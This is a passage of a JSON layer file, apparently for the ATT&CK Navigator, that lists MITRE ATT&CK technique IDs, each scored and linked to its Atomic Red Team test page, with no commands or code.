7.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/ato